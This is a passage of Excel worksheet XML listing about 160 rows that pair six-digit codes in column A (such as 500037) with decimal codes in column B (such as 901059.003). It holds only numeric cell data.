      <c r="B903" s="3">
        <v>901003.00199999998</v>
      </c>
    </row>
    <row r="904" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A904" s="5">
        <v>500074</v>
      </c>
      <c r="B904" s="3">
        <v>901003.00300000003</v>
      </c>
    </row>
    <row r="905" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A905" s="5">
        <v>500074</v>
      </c>
      <c r="B905" s="3">
        <v>901003.00399999996</v>
      </c>
    </row>
    <row r="906" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A906" s="5">
        <v>500074</v>
      </c>
      <c r="B906" s="3">
        <v>901069.00199999998</v>
      </c>
    </row>
    <row r="907" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A907" s="5">
        <v>500074</v>
      </c>
      <c r="B907" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="908" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A908" s="5">
        <v>500074</v>
      </c>
      <c r="B908" s="3">
        <v>901566.00199999998</v>
      </c>
    </row>
    <row r="909" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A909" s="5">
        <v>500074</v>
      </c>
      <c r="B909" s="3">
        <v>901012</v>
      </c>
    </row>
    <row r="910" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A910" s="5">
        <v>500074</v>
      </c>
      <c r="B910" s="3">
        <v>901021.00100000005</v>
      </c>
    </row>
    <row r="911" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A911" s="5">
        <v>500074</v>
      </c>
      <c r="B911" s="3">
        <v>901018</v>
      </c>
    </row>
    <row r="912" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A912" s="5">
        <v>500074</v>
      </c>
      <c r="B912" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="913" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A913" s="5">
        <v>500074</v>
      </c>
      <c r="B913" s="3">
        <v>901113</v>
      </c>
    </row>
    <row r="914" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A914" s="5">
        <v>500074</v>
      </c>
      <c r="B914" s="3">
        <v>901505.00300000003</v>
      </c>
    </row>
    <row r="915" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A915" s="5">
        <v>500074</v>
      </c>
      <c r="B915" s="3">
        <v>901016</v>
      </c>
    </row>
    <row r="916" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A916" s="5">
        <v>500074</v>
      </c>
      <c r="B916" s="3">
        <v>901033</v>
      </c>
    </row>
    <row r="917" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A917" s="5">
        <v>500074</v>
      </c>
      <c r="B917" s="3">
        <v>901221</v>
      </c>
    </row>
    <row r="918" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A918" s="5">
        <v>500074</v>
      </c>
      <c r="B918" s="3">
        <v>901204.00100000005</v>
      </c>
    </row>
    <row r="919" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A919" s="5">
        <v>500074</v>
      </c>
      <c r="B919" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="920" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A920" s="5">
        <v>500074</v>
      </c>
      <c r="B920" s="3">
        <v>901078</v>
      </c>
    </row>
    <row r="921" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A921" s="5">
        <v>500031</v>
      </c>
      <c r="B921" s="3">
        <v>901005</v>
      </c>
    </row>
    <row r="922" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A922" s="5">
        <v>500031</v>
      </c>
      <c r="B922" s="3">
        <v>901083</v>
      </c>
    </row>
    <row r="923" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A923" s="5">
        <v>500031</v>
      </c>
      <c r="B923" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="924" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A924" s="5">
        <v>500066</v>
      </c>
      <c r="B924" s="3">
        <v>901189</v>
      </c>
    </row>
    <row r="925" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A925" s="5">
        <v>500066</v>
      </c>
      <c r="B925" s="3">
        <v>901203</v>
      </c>
    </row>
    <row r="926" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A926" s="5">
        <v>500066</v>
      </c>
      <c r="B926" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="927" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A927" s="5">
        <v>500066</v>
      </c>
      <c r="B927" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="928" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A928" s="5">
        <v>500066</v>
      </c>
      <c r="B928" s="3">
        <v>901027.00199999998</v>
      </c>
    </row>
    <row r="929" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A929" s="5">
        <v>500066</v>
      </c>
      <c r="B929" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="930" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A930" s="5">
        <v>500066</v>
      </c>
      <c r="B930" s="3">
        <v>901566.00199999998</v>
      </c>
    </row>
    <row r="931" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A931" s="5">
        <v>500066</v>
      </c>
      <c r="B931" s="3">
        <v>901204.00100000005</v>
      </c>
    </row>
    <row r="932" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A932" s="5">
        <v>500066</v>
      </c>
      <c r="B932" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="933" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A933" s="5">
        <v>500020</v>
      </c>
      <c r="B933" s="3">
        <v>901480.00100000005</v>
      </c>
    </row>
    <row r="934" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A934" s="5">
        <v>500020</v>
      </c>
      <c r="B934" s="3">
        <v>901564.005</v>
      </c>
    </row>
    <row r="935" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A935" s="5">
        <v>500020</v>
      </c>
      <c r="B935" s="3">
        <v>901120</v>
      </c>
    </row>
    <row r="936" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A936" s="5">
        <v>500020</v>
      </c>
      <c r="B936" s="3">
        <v>901542.00199999998</v>
      </c>
    </row>
    <row r="937" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A937" s="5">
        <v>500120</v>
      </c>
      <c r="B937" s="3">
        <v>901548.00199999998</v>
      </c>
    </row>
    <row r="938" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A938" s="5">
        <v>500120</v>
      </c>
      <c r="B938" s="3">
        <v>901059.00699999998</v>
      </c>
    </row>
    <row r="939" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A939" s="5">
        <v>500120</v>
      </c>
      <c r="B939" s="3">
        <v>901555</v>
      </c>
    </row>
    <row r="940" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A940" s="5">
        <v>500120</v>
      </c>
      <c r="B940" s="3">
        <v>901574.00100000005</v>
      </c>
    </row>
    <row r="941" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A941" s="5">
        <v>500120</v>
      </c>
      <c r="B941" s="3">
        <v>901070.00399999996</v>
      </c>
    </row>
    <row r="942" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A942" s="5">
        <v>500120</v>
      </c>
      <c r="B942" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="943" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A943" s="5">
        <v>500120</v>
      </c>
      <c r="B943" s="3">
        <v>901566.00199999998</v>
      </c>
    </row>
    <row r="944" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A944" s="5">
        <v>500120</v>
      </c>
      <c r="B944" s="3">
        <v>901219</v>
      </c>
    </row>
    <row r="945" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A945" s="5">
        <v>500120</v>
      </c>
      <c r="B945" s="3">
        <v>901539</v>
      </c>
    </row>
    <row r="946" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A946" s="5">
        <v>500120</v>
      </c>
      <c r="B946" s="3">
        <v>901204.00100000005</v>
      </c>
    </row>
    <row r="947" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A947" s="5">
        <v>500120</v>
      </c>
      <c r="B947" s="3">
        <v>901497.00100000005</v>
      </c>
    </row>
    <row r="948" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A948" s="5">
        <v>500137</v>
      </c>
      <c r="B948" s="3">
        <v>901583.00100000005</v>
      </c>
    </row>
    <row r="949" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A949" s="5">
        <v>500137</v>
      </c>
      <c r="B949" s="3">
        <v>901036.00199999998</v>
      </c>
    </row>
    <row r="950" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A950" s="5">
        <v>500137</v>
      </c>
      <c r="B950" s="3">
        <v>901036.005</v>
      </c>
    </row>
    <row r="951" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A951" s="5">
        <v>500137</v>
      </c>
      <c r="B951" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="952" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A952" s="5">
        <v>500137</v>
      </c>
      <c r="B952" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="953" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A953" s="5">
        <v>500137</v>
      </c>
      <c r="B953" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="954" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A954" s="5">
        <v>500051</v>
      </c>
      <c r="B954" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="955" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A955" s="5">
        <v>500051</v>
      </c>
      <c r="B955" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="956" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A956" s="5">
        <v>500051</v>
      </c>
      <c r="B956" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="957" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A957" s="5">
        <v>500051</v>
      </c>
      <c r="B957" s="3">
        <v>901070.00399999996</v>
      </c>
    </row>
    <row r="958" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A958" s="5">
        <v>500051</v>
      </c>
      <c r="B958" s="3">
        <v>901570</v>
      </c>
    </row>
    <row r="959" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A959" s="5">
        <v>500051</v>
      </c>
      <c r="B959" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="960" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A960" s="5">
        <v>500051</v>
      </c>
      <c r="B960" s="3">
        <v>901021.00100000005</v>
      </c>
    </row>
    <row r="961" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A961" s="5">
        <v>500051</v>
      </c>
      <c r="B961" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="962" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A962" s="5">
        <v>500051</v>
      </c>
      <c r="B962" s="3">
        <v>901033</v>
      </c>
    </row>
    <row r="963" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A963" s="5">
        <v>500051</v>
      </c>
      <c r="B963" s="3">
        <v>901078</v>
      </c>
    </row>
    <row r="964" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A964" s="5">
        <v>500051</v>
      </c>
      <c r="B964" s="3">
        <v>901078.00300000003</v>
      </c>
    </row>
    <row r="965" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A965" s="5">
        <v>500085</v>
      </c>
      <c r="B965" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="966" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A966" s="5">
        <v>500085</v>
      </c>
      <c r="B966" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="967" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A967" s="5">
        <v>500085</v>
      </c>
      <c r="B967" s="3">
        <v>901114.00199999998</v>
      </c>
    </row>
    <row r="968" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A968" s="5">
        <v>500085</v>
      </c>
      <c r="B968" s="3">
        <v>901564.00800000003</v>
      </c>
    </row>
    <row r="969" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A969" s="5">
        <v>500085</v>
      </c>
      <c r="B969" s="3">
        <v>901056.00100000005</v>
      </c>
    </row>
    <row r="970" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A970" s="5">
        <v>500085</v>
      </c>
      <c r="B970" s="3">
        <v>901056.00199999998</v>
      </c>
    </row>
    <row r="971" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A971" s="5">
        <v>500085</v>
      </c>
      <c r="B971" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="972" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A972" s="5">
        <v>500085</v>
      </c>
      <c r="B972" s="3">
        <v>901566.00199999998</v>
      </c>
    </row>
    <row r="973" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A973" s="5">
        <v>500085</v>
      </c>
      <c r="B973" s="3">
        <v>901090.00300000003</v>
      </c>
    </row>
    <row r="974" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A974" s="5">
        <v>500085</v>
      </c>
      <c r="B974" s="3">
        <v>901204.00100000005</v>
      </c>
    </row>
    <row r="975" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A975" s="5">
        <v>500085</v>
      </c>
      <c r="B975" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="976" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A976" s="5">
        <v>500085</v>
      </c>
      <c r="B976" s="3">
        <v>901078</v>
      </c>
    </row>
    <row r="977" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A977" s="5">
        <v>500053</v>
      </c>
      <c r="B977" s="3">
        <v>901119</v>
      </c>
    </row>
    <row r="978" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A978" s="5">
        <v>500053</v>
      </c>
      <c r="B978" s="3">
        <v>901110</v>
      </c>
    </row>
    <row r="979" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A979" s="5">
        <v>500053</v>
      </c>
      <c r="B979" s="3">
        <v>901059</v>
      </c>
    </row>
    <row r="980" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A980" s="5">
        <v>500053</v>
      </c>
      <c r="B980" s="3">
        <v>901074.00100000005</v>
      </c>
    </row>
    <row r="981" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A981" s="5">
        <v>500053</v>
      </c>
      <c r="B981" s="3">
        <v>901133</v>
      </c>
    </row>
    <row r="982" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A982" s="5">
        <v>500053</v>
      </c>
      <c r="B982" s="3">
        <v>901070.00100000005</v>
      </c>
    </row>
    <row r="983" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A983" s="5">
        <v>500053</v>
      </c>
      <c r="B983" s="3">
        <v>901070.00399999996</v>
      </c>
    </row>
    <row r="984" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A984" s="5">
        <v>500053</v>
      </c>
      <c r="B984" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="985" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A985" s="5">
        <v>500053</v>
      </c>
      <c r="B985" s="3">
        <v>901090.00199999998</v>
      </c>
    </row>
    <row r="986" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A986" s="5">
        <v>500053</v>
      </c>
      <c r="B986" s="3">
        <v>901018</v>
      </c>
    </row>
    <row r="987" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A987" s="5">
        <v>500053</v>
      </c>
      <c r="B987" s="3">
        <v>901078</v>
      </c>
    </row>
    <row r="988" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A988" s="5">
        <v>500037</v>
      </c>
      <c r="B988" s="3">
        <v>901134</v>
      </c>
    </row>
    <row r="989" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A989" s="5">
        <v>500037</v>
      </c>
      <c r="B989" s="3">
        <v>901087.00199999998</v>
      </c>
    </row>
    <row r="990" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A990" s="5">
        <v>500037</v>
      </c>
      <c r="B990" s="3">
        <v>901560</v>
      </c>
    </row>
    <row r="991" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A991" s="5">
        <v>500037</v>
      </c>
      <c r="B991" s="3">
        <v>901560.00300000003</v>
      </c>
    </row>
    <row r="992" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A992" s="5">
        <v>500037</v>
      </c>
      <c r="B992" s="3">
        <v>901119</v>
      </c>
    </row>
    <row r="993" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A993" s="5">
        <v>500037</v>
      </c>
      <c r="B993" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="994" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A994" s="5">
        <v>500037</v>
      </c>
      <c r="B994" s="3">
        <v>901110.00199999998</v>
      </c>
    </row>
    <row r="995" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A995" s="5">
        <v>500037</v>
      </c>
      <c r="B995" s="3">
        <v>901059</v>
      </c>
    </row>
    <row r="996" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A996" s="5">
        <v>500037</v>
      </c>
      <c r="B996" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="997" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A997" s="5">
        <v>500037</v>
      </c>
      <c r="B997" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="998" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A998" s="5">
        <v>500037</v>
      </c>
      <c r="B998" s="3">
        <v>901059.00699999998</v>
      </c>
    </row>
    <row r="999" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A999" s="5">
        <v>500037</v>
      </c>
      <c r="B999" s="3">
        <v>901555</v>
      </c>
    </row>
    <row r="1000" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1000" s="5">
        <v>500037</v>
      </c>
      <c r="B1000" s="3">
        <v>901555.00300000003</v>
      </c>
    </row>
    <row r="1001" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1001" s="5">
        <v>500037</v>
      </c>
      <c r="B1001" s="3">
        <v>901213</v>
      </c>
    </row>
    <row r="1002" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1002" s="5">
        <v>500037</v>
      </c>
      <c r="B1002" s="3">
        <v>901005</v>
      </c>
    </row>
    <row r="1003" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1003" s="5">
        <v>500037</v>
      </c>
      <c r="B1003" s="3">
        <v>901074.00199999998</v>
      </c>
    </row>
    <row r="1004" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1004" s="5">
        <v>500037</v>
      </c>
      <c r="B1004" s="3">
        <v>901573.00199999998</v>
      </c>
    </row>
    <row r="1005" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1005" s="5">
        <v>500037</v>
      </c>
      <c r="B1005" s="3">
        <v>901048.00300000003</v>
      </c>
    </row>
    <row r="1006" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1006" s="5">
        <v>500037</v>
      </c>
      <c r="B1006" s="3">
        <v>901068</v>
      </c>
    </row>
    <row r="1007" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1007" s="5">
        <v>500037</v>
      </c>
      <c r="B1007" s="3">
        <v>901562.00100000005</v>
      </c>
    </row>
    <row r="1008" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1008" s="5">
        <v>500037</v>
      </c>
      <c r="B1008" s="3">
        <v>901070.00399999996</v>
      </c>
    </row>
    <row r="1009" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1009" s="5">
        <v>500037</v>
      </c>
      <c r="B1009" s="3">
        <v>901036.00399999996</v>
      </c>
    </row>
    <row r="1010" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1010" s="5">
        <v>500037</v>
      </c>
      <c r="B1010" s="3">
        <v>901046</v>
      </c>
    </row>
    <row r="1011" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1011" s="5">
        <v>500037</v>
      </c>
      <c r="B1011" s="3">
        <v>901095</v>
      </c>
    </row>
    <row r="1012" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1012" s="5">
        <v>500037</v>
      </c>
      <c r="B1012" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="1013" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1013" s="5">
        <v>500037</v>
      </c>
      <c r="B1013" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="1014" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1014" s="5">
        <v>500037</v>
      </c>
      <c r="B1014" s="3">
        <v>901003.00100000005</v>
      </c>
    </row>
    <row r="1015" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1015" s="5">
        <v>500037</v>
      </c>
      <c r="B1015" s="3">
        <v>901003.00300000003</v>
      </c>
    </row>
    <row r="1016" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1016" s="5">
        <v>500037</v>
      </c>
      <c r="B1016" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="1017" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1017" s="5">
        <v>500037</v>
      </c>
      <c r="B1017" s="3">
        <v>901566.00300000003</v>
      </c>
    </row>
    <row r="1018" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1018" s="5">
        <v>500037</v>
      </c>
      <c r="B1018" s="3">
        <v>901572</v>
      </c>
    </row>
    <row r="1019" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1019" s="5">
        <v>500037</v>
      </c>
      <c r="B1019" s="3">
        <v>901021.00100000005</v>
      </c>
    </row>
    <row r="1020" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1020" s="5">
        <v>500037</v>
      </c>
      <c r="B1020" s="3">
        <v>901018</v>
      </c>
    </row>
    <row r="1021" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1021" s="5">
        <v>500037</v>
      </c>
      <c r="B1021" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="1022" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1022" s="5">
        <v>500037</v>
      </c>
      <c r="B1022" s="3">
        <v>901553.00199999998</v>
      </c>
    </row>
    <row r="1023" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1023" s="5">
        <v>500037</v>
      </c>
      <c r="B1023" s="3">
        <v>901569.00199999998</v>
      </c>
    </row>
    <row r="1024" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1024" s="5">
        <v>500037</v>
      </c>
      <c r="B1024" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="1025" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1025" s="5">
        <v>500037</v>
      </c>
      <c r="B1025" s="3">
        <v>901078</v>
      </c>
    </row>
    <row r="1026" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1026" s="5">
        <v>500037</v>
      </c>
      <c r="B1026" s="3">
        <v>901102</v>
      </c>
    </row>
    <row r="1027" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1027" s="5">
        <v>500037</v>
      </c>
      <c r="B1027" s="3">
        <v>901047</v>
      </c>
    </row>
    <row r="1028" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1028" s="5">
        <v>500046</v>
      </c>
      <c r="B1028" s="3">
        <v>901583.00100000005</v>
      </c>
    </row>
    <row r="1029" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1029" s="5">
        <v>500046</v>
      </c>
      <c r="B1029" s="3">
        <v>901071.00399999996</v>
      </c>
    </row>
    <row r="1030" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1030" s="5">
        <v>500046</v>
      </c>
      <c r="B1030" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="1031" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1031" s="5">
        <v>500046</v>
      </c>
      <c r="B1031" s="3">
        <v>901059</v>
      </c>
    </row>
    <row r="1032" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1032" s="5">
        <v>500046</v>
      </c>
      <c r="B1032" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="1033" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1033" s="5">
        <v>500046</v>
      </c>
      <c r="B1033" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="1034" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1034" s="5">
        <v>500046</v>
      </c>
      <c r="B1034" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="1035" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1035" s="5">
        <v>500046</v>
      </c>
      <c r="B1035" s="3">
        <v>901059.00699999998</v>
      </c>
    </row>
    <row r="1036" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1036" s="5">
        <v>500046</v>
      </c>
      <c r="B1036" s="3">
        <v>901543.00300000003</v>
      </c>
    </row>
    <row r="1037" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1037" s="5">
        <v>500046</v>
      </c>
      <c r="B1037" s="3">
        <v>901486</v>
      </c>
    </row>
    <row r="1038" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1038" s="5">
        <v>500046</v>
      </c>
      <c r="B1038" s="3">
        <v>901005</v>
      </c>
    </row>
    <row r="1039" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1039" s="5">
        <v>500046</v>
      </c>
      <c r="B1039" s="3">
        <v>901587.00100000005</v>
      </c>
    </row>
    <row r="1040" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1040" s="5">
        <v>500046</v>
      </c>
      <c r="B1040" s="3">
        <v>901546.01100000006</v>
      </c>
    </row>
    <row r="1041" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1041" s="5">
        <v>500046</v>
      </c>
      <c r="B1041" s="3">
        <v>901567.00199999998</v>
      </c>
    </row>
    <row r="1042" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1042" s="5">
        <v>500046</v>
      </c>
      <c r="B1042" s="3">
        <v>901210</v>
      </c>
    </row>
    <row r="1043" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1043" s="5">
        <v>500046</v>
      </c>
      <c r="B1043" s="3">
        <v>901008</v>
      </c>
    </row>
    <row r="1044" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1044" s="5">
        <v>500046</v>
      </c>
      <c r="B1044" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="1045" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1045" s="5">
        <v>500046</v>
      </c>
      <c r="B1045" s="3">
        <v>901559.00199999998</v>
      </c>
    </row>
    <row r="1046" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1046" s="5">
        <v>500046</v>
      </c>
      <c r="B1046" s="3">
        <v>901036.00399999996</v>
      </c>
    </row>
    <row r="1047" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1047" s="5">
        <v>500046</v>
      </c>
      <c r="B1047" s="3">
        <v>901036.005</v>
      </c>
    </row>
    <row r="1048" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1048" s="5">
        <v>500046</v>
      </c>
      <c r="B1048" s="3">
        <v>901571</v>
      </c>
    </row>
    <row r="1049" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1049" s="5">
        <v>500046</v>
      </c>
      <c r="B1049" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="1050" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1050" s="5">
        <v>500046</v>
      </c>
      <c r="B1050" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="1051" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1051" s="5">
        <v>500046</v>
      </c>
      <c r="B1051" s="3">
        <v>901566.00199999998</v>
      </c>
    </row>
    <row r="1052" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1052" s="5">
        <v>500046</v>
      </c>
      <c r="B1052" s="3">
        <v>901021.00100000005</v>
      </c>
    </row>
    <row r="1053" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1053" s="5">
        <v>500046</v>
      </c>
      <c r="B1053" s="3">
        <v>901021.00399999996</v>
      </c>
    </row>
    <row r="1054" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1054" s="5">
        <v>500046</v>
      </c>
      <c r="B1054" s="3">
        <v>901021.005</v>
      </c>
    </row>
    <row r="1055" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1055" s="5">
        <v>500046</v>
      </c>
      <c r="B1055" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="1056" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1056" s="5">
        <v>500046</v>
      </c>
      <c r="B1056" s="3">
        <v>901113</v>
      </c>
    </row>
    <row r="1057" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1057" s="5">
        <v>500046</v>
      </c>
      <c r="B1057" s="3">
        <v>901218.005</v>
      </c>
    </row>
    <row r="1058" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1058" s="5">
        <v>500046</v>
      </c>
      <c r="B1058" s="3">
        <v>901558.00300000003</v>
      </c>
    </row>
    <row r="1059" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1059" s="5">
        <v>500046</v>
      </c>
      <c r="B1059" s="3">
        <v>901553.00199999998</v>
      </c>
    </row>
    <row r="1060" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1060" s="5">
        <v>500046</v>
      </c>
      <c r="B1060" s="3">
        <v>901204.00100000005</v>
      </c>
    </row>
